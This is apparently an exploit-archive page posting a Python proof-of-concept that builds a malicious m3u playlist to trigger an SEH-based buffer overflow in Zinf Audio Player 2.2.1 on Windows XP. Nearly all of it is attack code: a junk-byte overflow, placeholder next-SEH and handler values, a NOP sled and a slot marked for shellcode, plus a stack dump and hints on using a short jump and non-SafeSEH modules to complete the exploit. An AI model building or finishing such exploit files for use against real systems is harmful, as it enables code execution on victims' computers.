Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)



EKU-ID: 1691 CVE: OSVDB-ID:
Author: mAniNdArK Published: 2012-03-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/python


#Product Details:
#---------------------------------------------------------------------------------
#The Zinf audio player is a simple, but powerful audio player for Linux and Win32.
#It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast
#HTTP streaming, RTP streaming, a powerful music browser, theme support
#and a download manager. Zinf is based on the FreeAmp source code. However,
#AMP is a trademark of PlayMedia Systems, Inc., and therefore the original name
#of the project cannot be used any longer.On this website the old project will
#be referred to as FreeA*p.
#---------------------------------------------------------------------------------

print ("Exploit Title: Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)\n");
print ("Version:       2.2.1\n");
print ("Date:          3-18-2012\n");
print ("Author:         mAniNdArK\n");
print ("Software Link: http://www.zinf.org\n");
print ("Category: Local\n");
print ("Tested on:     Windows XP SP3 Professional(En)\n");

print ("Greetz To:Bedu33n,N!1l,Rex0Man,Escape X0ne,JingoBD,Annihilat0r_BD,00xnull,\n");
print ("34GL3_3Y3,5!L3NT @55@55!N,s1l3n7 BD,\n");
print ("Rudr0 Akash,p5YcH0 d0d93r And All The Members\n");
print ("Of Bangladesh Cyber Army(BCA)\n");
print "Mail:manindark.bca@gmail.com"
print "---------------------------------------------------------\n";


#0198F9B4   41414141  AAAA
#0198F9B8   41414141  AAAA
#0198F9BC   41414141  AAAA
#0198F9C0   41414141  AAAA
#0198F9C4   41414141  AAAA
#0198F9C8   41414141  AAAA
#0198F9CC   41414141  AAAA
#0198F9D0   41414141  AAAA
#0198F9D4   41414141  AAAA
#0198F9D8   41414141  AAAA
#0198F9DC   41414141  AAAA
#0198F9E0   41414141  AAAA
#0198F9E4   41414141  AAAA
#0198F9E8   41414141  AAAA
#0198F9EC   41414141  AAAA
#0198F9F0   41414141  AAAA
#0198F9F4   41414141  AAAA
#0198F9F8   41414141  AAAA
#0198F9FC   42424242  BBBB  Pointer to next SEH record
#0198FA00   43434343  CCCC  SE handler
#0198FA08   90909090  ....
#0198FA0C   44444444  DDDD
#0198FA10   44444444  DDDD

#instruction:
#Right click and select open...
#And select playlist file poc.m3u"

file="poc.m3u"

junk="\x41"*12148
nseh="B"*4     # Address=42424242 SE handler=*** CORRUPT ENTRY ***  use a short jmp here...
seh="C"*4       # Address=0198F9FC SE handler=43434343
                #there are lots of modules without safeseh..like download.ui...u can use it to bypass seh..
nop="\x90"*8 
shellcode="D"*1000 #shellcode will go here


                   
try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( junk +nseh+seh+ nop+ shellcode)
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";